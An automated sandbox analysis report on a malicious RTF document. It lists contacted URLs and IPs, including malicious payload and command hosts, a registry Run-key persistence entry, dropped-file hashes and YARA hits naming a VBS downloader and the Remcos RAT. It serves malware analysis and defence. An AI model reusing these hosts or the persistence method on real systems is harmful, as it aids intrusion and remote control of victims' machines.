                                  http://www.diginotar.nl/cps/pkioverheid0wscript.exe, 00000005.00000003.402244505.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.408615592.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.400951239.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.404645972.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.455161670.0000000004E82000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://uploaddeimagens.com.br/images/004/powershell.exe, 0000000A.00000002.455161670.0000000004E41000.00000004.00000020.00020000.00000000.sdmptrue
                                  • 4%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://app01.system.com.br/RDWeb/Pages/login.aspxdwscript.exe, 00000005.00000003.380723170.0000000002A83000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356767117.0000000002A83000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.403900333.0000000002A83000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356796537.0000000002A83000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.400853574.0000000002A83000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://www.google.comwscript.exe, 00000005.00000003.403024830.0000000003840000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://paste.ee/d/e1cCs5wscript.exe, 00000005.00000003.403024830.0000000003840000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl0wscript.exe, 00000005.00000003.402244505.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.408615592.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.400951239.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.404645972.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.455161670.0000000004E82000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://geoplugin.net/json.gp(GZ&RegAsm.exe, 0000000F.00000002.628166706.0000000000775000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://uploaddeimagens.com.br/images/00powershell.exe, 0000000A.00000002.455161670.0000000004E5D000.00000004.00000020.00020000.00000000.sdmptrue
                                      • 3%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://geoplugin.net/json.gp/Cpowershell.exe, 0000000A.00000002.446552841.0000000004266000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmptrue
                                      • URL Reputation: phishing
                                      unknown
                                      https://uploaddeimagens.com.brpowershell.exe, 0000000A.00000002.446552841.000000000269A000.00000004.00000800.00020000.00000000.sdmptrue
                                      • 7%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://contoso.com/powershell.exe, 0000000A.00000002.446552841.0000000003589000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://nuget.org/nuget.exepowershell.exe, 0000000A.00000002.446552841.0000000003589000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://paste.ee/wscript.exe, 00000005.00000003.402244505.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.408615592.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.400951239.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.404645972.00000000034F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://analytics.paste.ee;wscript.exe, 00000005.00000003.403024830.0000000003840000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          low
                                          http://go.microsoft.cpowershell.exe, 0000000A.00000002.446170067.000000000036A000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://cdnjs.cloudflare.comwscript.exe, 00000005.00000003.403024830.0000000003840000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://app01.system.com.br/RDWeb/Pages/login.aspx70wscript.exe, 00000005.00000002.405142889.0000000000463000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.402664845.0000000000454000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.401474551.0000000000454000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://cdnjs.cloudflare.com;wscript.exe, 00000005.00000003.403024830.0000000003840000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            low
                                            http://app01.system.com.br/RDWeb/Pages/login.aspxLwscript.exe, 00000005.00000003.402664845.0000000000454000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.401474551.0000000000454000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.405142889.0000000000454000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • 0%, Virustotal, Browse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://ocsp.entrust.net0Dwscript.exe, 00000005.00000003.402244505.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.408615592.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.400951239.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.404645972.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.455161670.0000000004E82000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000008.00000002.550401395.0000000002382000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.446552841.0000000002561000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://secure.comodo.com/CPS0wscript.exe, 00000005.00000003.402244505.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.408615592.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.400951239.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.404645972.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.455161670.0000000004E82000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://secure.gravatar.comwscript.exe, 00000005.00000003.403024830.0000000003840000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://themes.googleusercontent.comwscript.exe, 00000005.00000003.403024830.0000000003840000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    http://app01.system.com.br/RDWeb/Pages/login.aspxwscript.exe, 00000005.00000003.380723170.0000000002A83000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.403573136.000000000041C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.405142889.0000000000463000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356767117.0000000002A83000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.403900333.0000000002A83000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.402664845.0000000000454000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.401474551.0000000000454000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356753900.000000000040E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356796537.0000000002A83000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.401153718.00000000003F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.400853574.0000000002A83000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.401474551.000000000040E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356767117.0000000002A64000.00000004.00000020.00020000.00000000.sdmp, indexphppagenotfound[1].gif.2.dr, coinfishingusagegirlsknow.vbs.2.drfalse
                                                    • 0%, Virustotal, Browse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://crl.entrust.net/2048ca.crl0wscript.exe, 00000005.00000003.402244505.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.408615592.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.400951239.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.404645972.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.455161670.0000000004E82000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
IP | Domain | Country | ASN | ASN Name | Malicious
107.172.31.6 | unknown | United States | 36352 | AS-COLOCROSSINGUS | true
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
104.21.84.67 | paste.ee | United States | 13335 | CLOUDFLARENETUS | false
172.67.215.45 | uploaddeimagens.com.br | United States | 13335 | CLOUDFLARENETUS | true
194.187.251.115 | sembe.duckdns.org | United Kingdom | 9009 | M247GB | true
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1434624
Start date and time: 2024-05-01 14:54:09 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 13s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 20
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: nU7Z8sPyvf.rtf (renamed because the original name is a hash value)
Original Sample Name: 0aba1094e29ed6d65fa5a8b1ec8c2e57.rtf
Detection: MAL
Classification: mal100.spre.troj.spyw.expl.evad.winRTF@14/20@6/5
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 75
• Number of non-executed functions: 190
Cookbook Comments:
• Found application associated with file extension: .rtf
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Active ActiveX Object
• Scroll down
• Close Viewer
• Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
• Execution Graph export aborted for target powershell.exe, PID 3428 because it is empty
• HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
05:55:44 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\antre.vbs
05:55:54 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\antre.vbs
14:54:59 | API Interceptor | 245x Sleep call for process: EQNEDT32.EXE modified
14:55:03 | API Interceptor | 197x Sleep call for process: wscript.exe modified
14:55:24 | API Interceptor | 183x Sleep call for process: powershell.exe modified
14:55:45 | API Interceptor | 197588x Sleep call for process: RegAsm.exe modified
                                                      • 178.237.33.50
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                      No context
Process: C:\Windows\SysWOW64\cmd.exe
File Type: ASCII text, with very long lines (332), with CRLF line terminators
Category: dropped
Size (bytes): 317735
Entropy (8bit): 5.077747710313139
Encrypted: false
SSDEEP: 3072:jcjl2470C29btFVSqHRD4ii71yO1lQ014CTt1ns3wflGsZcfo0QA5PGpb8hG:jcz0CEtFVS8Rkii7191lF1rflGsZcfw
MD5: 6F23FBE5AD6B55F71CF0AAA3AE1A9787
SHA1: 7BDDFC3B02528E307DBE8C3400372E629EC78B8A
SHA-256: 699744A6554AC8C2FDA78CD827BE561DC899527F7B173F9E10BABE404CC67E9E
SHA-512: FD6DBCC4FA568BA2CCD097FF923E571441B157FD48D4E6A8811A33A9E4ECF4B1AA3069B0A980B4FD0478525A29A71C9DFA98DAFFD0C2D4FCCF711EA33535BD76
Malicious: true
Reputation: low
                                                      Preview:'..' Copyright (c) Microsoft Corporation. All rights reserved...'..' Windows Software Licensing Management Tool...'..' Script Name: slmgr.vbs..'....Option Explicit....Dim g_objWMIService, g_strComputer, g_strUserName, g_strPassword..g_strComputer = "."..Dim g_serviceConnected..g_serviceConnected = False....dim g_EchoString..g_EchoString = ""....dim g_objRegistry....Dim g_resourceDictionary, g_resourcesLoaded..Set g_resourceDictionary = CreateObject("Scripting.Dictionary")..g_resourcesLoaded = False....Dim g_DeterminedDisplayFlags..g_DeterminedDisplayFlags = False....Dim g_ShowKmsInfo..Dim g_ShowKmsClientInfo..Dim g_ShowTkaClientInfo..Dim g_ShowTBLInfo..Dim g_ShowPhoneInfo....g_ShowKmsInfo = False..g_ShowKmsClientInfo = false..g_ShowTBLInfo = False..g_ShowPhoneInfo = False....' Messages....'Global options..private const L_optInstallProductKey = "ipk"..private const L_optInstallProductKeyUsage = "Install product key (replaces existing key)"....private const L
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 4760
Entropy (8bit): 4.831175347448903
Encrypted: false
SSDEEP: 96:ACJ2Woe5v2k6Lm5emmXIGbgyg12jDs+un/iQLEYFjDaeWJ6KGcmXoFRLcU6/KD:vxoe5vVsm5emdkgkjDt4iWN3yBGHUdcY
MD5: A50F0B3600A83789D28B424D69626266
SHA1: 0183DA34933788FF97602C9DEA82F39CAD0697C2
SHA-256: 7B188A9EEAC0649E088208C137625F64175EDAC8AE7F25D8A0F8B5611C824A8A
SHA-512: 335DCAA6FE83BC0F492B353C036EA2A5CA52ECE628520A3E50BAF7C373D4CDBAC7585341D91D9B210C3EC4378525AA934CCB5BB418C4D776105FBB59F4873216
Malicious: false
                                                      Preview:PSMODULECACHE......%+./...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........%+./...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 0.34726597513537405
Encrypted: false
SSDEEP: 3:Nlll:Nll
MD5: 446DD1CF97EABA21CF14D03AEBC79F27
SHA1: 36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256: A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512: A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious: false
Process: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type: Unknown
Category: dropped
Size (bytes): 62754
Entropy (8bit): 3.415813360054804
Encrypted: false
SSDEEP: 384:FZAaML0EZDnd33oBd33sGMnpMV4ZIRpuPkG6jM1L7Kc0ZCEXJg:7xindnoBdngiV4ZIRgPkGq9ZxZg
MD5: 69A1EBFD93489A6D3DA3ED27FE410D2D
SHA1: 7E138C9C08073B3398BEBFD3DABE8CCD0DE2BA91
SHA-256: 0A363498260F2D08ED884453FC508E0F8812E16C95AA824C8F3A72BE2DEBA140
SHA-512: 4925CC93A10364966AE6F432194D3613A51D176F4EEFD447B679446DCB6CADC008755BC1E17DADA1FCACA2FC56489BA9783CB4A89369B0505BAD1E2C9E578BE5
Malicious: true
Yara Hits:
• Rule: JoeSecurity_VBS_Downloader_Generic, Description: Yara detected VBS Downloader Generic, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\indexphppagenotfound[1].gif, Author: Joe Security
                                                      Preview:..'.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....'.....'. .C.o.p.y.r.i.g.h.t. .(.c.). .M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n... .A.l.l. .r.i.g.h.t.s. .r.e.s.e.r.v.e.d.......'.....'. .A.b.s.t.r.a.c.t.:.....'. .p.r.n.p.o.r.t...v.b.s. .-. .P.o.r.t. .s.c.r.i.p.t. .f.o.r. .W.M.I. .o.n. .W.i.n.d.o.w.s. .....'. . . . . .u.s.e.d. .t.o. .a.d.d.,. .d.e.l.e.t.e. .a.n.d. .l.i.s.t. .p.o.r.t.s.....'. . . . . .a.l.s.o. .f.o.r. .g.e.t.t.i.n.g. .a.n.d. .s.e.t.t.i.n.g. .t.h.e. .p.o.r.t. .c.o.n.f.i.g.u.r.a.t.i.o.n.....'.....'. .U.s.a.g.e.:.....'. .p.r.n.p.o.r.t. .[.-.a.d.l.g.t.?.]. .[.-.r. .p.o.r.t.]. .[.-.s. .s.e.r.v.e.r.]. .[.-.u. .u.s.e.r. .n.a.m.e.]. .[.-.w. .p.a.s.s.w.o.r.d.].....'. . . . . . . . . . . . . . . . . . . .[.-.o. .r.a.w.|.l.p.r.]. .[.-.h. .h.o.s.t. .a.d.d.r.e.s.s.]. .[.-.q. .q.u.e.u.e.]. .[.-.n. .n.u.m.b.e.r.].....'. . . . . . . . . . . . . . . . . . . .[.-.m.e. .|. .-.m.d. .]. .[.-.i.
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type: JSON data
Category: dropped
Size (bytes): 988
Entropy (8bit): 5.017915229257509
Encrypted: false
SSDEEP: 24:qtYdRNuKyGX852sesPvXhNlT3/75ciWro:mYPN0GX85TrPvhjTl2ro
MD5: E294354D8528EFF8B2AAE25FB8E27026
SHA1: 4B91A1DB0628F01F3B71B04F58632466ED6C90FF
SHA-256: A14689E9711BD63B8E48800CC1659BCC62754D41A7FDDEF4B11F10F00D0B2E2E
SHA-512: DCB81252341EE749929E5FC6DBAD6E6EAD7469ECC13587D7858DFE829EE41F21FC0E17F0B92F8E86913D99474495C2B60D00BBC8182FD537C78B413E8AF76B14
Malicious: false
                                                      Preview:{. "geoplugin_request":"149.18.24.96",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Washington",. "geoplugin_region":"District of Columbia",. "geoplugin_regionCode":"DC",. "geoplugin_regionName":"District of Columbia",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"511",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"38.894",. "geoplugin_longitude":"-77.0365",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
Process: C:\Windows\SysWOW64\wscript.exe
File Type: Unicode text, UTF-8 text, with very long lines (11453), with CRLF line terminators
Category: dropped
Size (bytes): 13423
Entropy (8bit): 4.731085151640693
Encrypted: false
SSDEEP: 384:oFgTthVkALsLEFr0MHwd+mcyGza23LjBOH+KGR0rVpPgR5VNpbcIus4pX:BVpYwFrrwgfyGm23LjBdBaVy34Lso
MD5: 16D34E32110CD19F678E2DF3FFB5DDBF
SHA1: 2018D275F1CE7E96B737819B0422C11DC019E727
SHA-256: 57DA2007D7039D66F29210122B43C2650E058E2B827716F3366AC1C28DC65C36
SHA-512: EEFBCC46AE70FE6174C333440E3818694A9334B70E7ACC39A8627EB5D74193F2412ED21613ED6BF7C87B5F3B6B144FCEFDE46ED1B17DD674BF2D65630BE039EC
Malicious: false
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 16384
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3::
MD5: CE338FE6899778AACFC28414F2D9498B
SHA1: 897256B6709E1A4DA9DABA92B6BDE39CCFCCD8C1
SHA-256: 4FE7B59AF6DE3B665B67788CC2F99892AB827EFAE3A467342B3BB4E3BC8E5BFE
SHA-512: 6EB7F16CF7AFCABE9BDEA88BDAB0469A7937EB715ADA9DFD8F428D9D38D86133945F5F2F2688DDD96062223A39B5D47F07AFC3C48D9DB1D5EE3F41C8D274DCCF
Malicious: false
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 6144
Entropy (8bit): 3.4724741060256714
Encrypted: false
SSDEEP: 96:igTRbSjvThJlnA+Gd2t61Xlo/MBVzTVAgl8wJ7JDf5f/n/sMkyKx2DB/BfVuD:VTRbihrnNGd2t6FiEBVzaUzDhn/sM4CU
MD5: E6E9E620991BD50A09E6448D471C7ED6
SHA1: 35440BA961F6F3CBEF5EAFAE6E1439200F08E9A2
SHA-256: 0A65BDFBA994A72620715862FF7EC804A12994DD6AD4394ED47DC3E52371F0FC
SHA-512: 070E8F9502B4EB1CAAFDFAFFAE6873EE8FE910BCFB8D3CA039E5D5B26C1B0990880BD6A632455827E35F78BDECCED8EAE389469B913E15DBAA837A0442FD1906
Malicious: false
                                                      Preview:..............2.8.7.6.6.5.0.8.%.?.6.*...*.=.`.+./.$.6.)...~.%.5.=.|.].2./._.#.+.8.9...*.@...@.6.[.^.>.[...).0.].(._...[...%.7.1...@.!.3.9.*.!.`...?._.(.3.^.`./.5.(.&...7.^.+.].,.@.).<.?.=.-.:.%.1.>.%.-.*.!.&.#.,.+.-.~.3...(.?.?.9.>.<.%.!.|.^.1...%.!.-.~.7...2.+./.<.^.6.+.`.:.(.[.).?.>./.5.(.*.3.].).?.<.%.?.(.[.].-.&.=.,...~.(.?.|.#.5.(.+...6.?...?...!.%.%.).?.1.6.#.~.|.;...`.4.-.(.?.?.9.@.3.0.;.`.?.>.3.,.).,./.;.!...#.2.<.0.-.<.@.2.,.?.].[.5.^.<.2.9.).).>.8.=.-.0.?.|...?.~._.7.?.?.?.%.`.9.?.7.)...>.>.2.'.<.~.+.`.|.&.).%.%.4.>.[.!.~.&.8.0.).4.~.;.(.&.%.6.^.[.7.+.?.8.=.;.?.?.$...%.%.,.=.(.9.^...>.~.<.0.?.!.(...^.^.~.1.`.~.,.[.6.?.5.6.'.;.>.4.?.?.?.|.@.&.%.+...-.:.8.&.../.*.#.?.?.).+.9.4.?.0.=.(.'.;.3.-.8...=.:.-.!.*.1.?.?.#.*.%.~.2.=.$.`.4.$.&.4.%.?.`.~.!.?.;.?.9...$.<...!.?.:.'.?.5._.).1.`.~.8.[.=.%.../.!.].#.;.@.3.*.:.;.>.[...8.7.!.?.5.8.`.6.6.~.).?.,.%.%.,.?.=.#.].&.).'.%.).!.?.%.?.`.$.%.-.<.!.@.).^.).1.-.?.[.<.].(.6.].^.;.|...|.?.).?.^.+.0.?.,.?.4.?.=.^.=.!.|.[.*.:.7.`.;.1.:.6.&...`.
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):1024
                                                      Entropy (8bit):0.05390218305374581
                                                      Encrypted:false
                                                      SSDEEP:3:ol3lYdn:4Wn
                                                      MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                      SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                      SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                      SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                      Malicious:false
                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview:1
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview:1
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview:1
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview:1
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):420
                                                      Entropy (8bit):3.464161626974459
                                                      Encrypted:false
                                                      SSDEEP:6:6lx7Q4b5YcIeeDAlpJSNombQeWAAey11Vl+Skec/l1Vl+SkIMl419gQB:6lC4DeclyZWFe2wB/NwEMQgM
                                                      MD5:285BF8210F3F2CB23C5FE9D23CF35A5F
                                                      SHA1:48CF69F50FEA0BAEDE2CAE128EC4DFC1702B1DF6
                                                      SHA-256:D21359D2D0CF9B7899AE4EBA656B12319195C22F5CF561994F66499DBFA7B7D1
                                                      SHA-512:61F84486FD28584AE6BC9B9D8CB02BE696AD56BA778C02A00C7A9A60236EA5C2649BA00B1A8A3C8C72C575C7C6AFCF2639A04DCBF52702EABAC09A767968AE06
                                                      Malicious:true
                                                      Yara Hits:
                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Local\Temp\note\nots.dat, Author: Joe Security
